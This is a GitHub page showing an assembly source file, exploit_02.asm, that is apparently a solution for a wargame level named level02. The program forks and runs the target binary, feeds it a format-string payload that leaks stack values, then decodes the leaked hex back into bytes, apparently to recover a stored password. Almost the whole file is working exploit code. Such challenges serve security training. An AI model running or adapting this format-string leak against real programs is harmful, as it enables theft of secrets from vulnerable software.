-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit_02.asm
More file actions
146 lines (141 loc) · 2.36 KB
/
exploit_02.asm
File metadata and controls
146 lines (141 loc) · 2.36 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
format ELF64 executable $03
entry _start
struc string data*& {
.: db data
.length = ($ - .)
}
segment executable readable
_start:
and rsp, not $0F
cld
mov rbp, rsp
sub rsp, $50 + $10
mov rax, $16
mov rdi, rsp
syscall
test rax, rax
jnz .exit
mov rax, $16
lea rdi, qword [rsp+$08]
syscall
test rax, rax
jnz .exit
mov rax, $20
mov rdi, $01
syscall
mov r12, rax
mov rax, $21
mov edi, dword [rsp]
xor rsi, rsi
syscall
mov rax, $21
mov edi, dword [rsp+$0C]
mov rsi, $01
syscall
mov rax, $39
syscall
test rax, rax
jz .child
mov rax, $01
mov edi, dword [rsp+$04]
mov rsi, _username
mov rdx, _username.length
syscall
mov rax, $01
mov edi, dword [rsp+$04]
mov rsi, _password
mov rdx, _password.length
syscall
mov rax, $03
mov edi, dword [rsp+$04]
syscall
xor rbx, rbx
sub rsp, $0100
mov r13, rsp
.read:
xor rax, rax
mov edi, dword [rbp-$58]
lea rsi, qword [rbp-$50]
mov rdx, $50
syscall
test eax, eax
jz .exit
lea rdi, qword [rbp-$50]
mov rcx, $50
test rbx, rbx
jnz .skip
mov al, '<'
repnz scasb
jnz .read
mov bl, $01
.skip:
mov rsi, rdi
mov rdx, rcx
mov al, '>'
repnz scasb
setz r9b
movzx rax, r9b
sub rdx, rcx
mov rcx, rdx
sub rcx, rax
mov rdi, r13
rep movsb
mov r13, rdi
test r9b, r9b
jz .read
.convert:
mov rcx, r13
sub rcx, rsp
shr rcx, $01
jrcxz .exit
mov rdx, rcx
mov rsi, rsp
xor bl, bl
.reload:
lodsb
cmp al, $61
jae .lower
cmp al, $41
jae .upper
sub al, $30
jmp .next
.lower:
sub al, $61
jmp .adjust
.upper:
sub al, $41
.adjust:
add al, $0A
.next:
test bl, bl
jnz .toAscii
mov ah, al
not bl
jmp .reload
.toAscii:
xor bl, bl
shl ah, $04
add al, ah
dec rsp
mov byte [rsp], al
loop .reload
mov rax, $01
mov rdi, r12
mov rsi, rsp
syscall
jmp .exit
.child:
mov rax, $3B
mov rdi, _program
xor rdx, rdx
push rdx rdi
mov rsi, rsp
syscall
.exit:
mov rax, $3C
xor rdi, rdi
syscall
segment readable
_username string "<%26$016lx%25$016lx%24$016lx%23$016lx%22$016lx>", $0A
_password string $0A
_program: db "/home/users/level02/level02", $00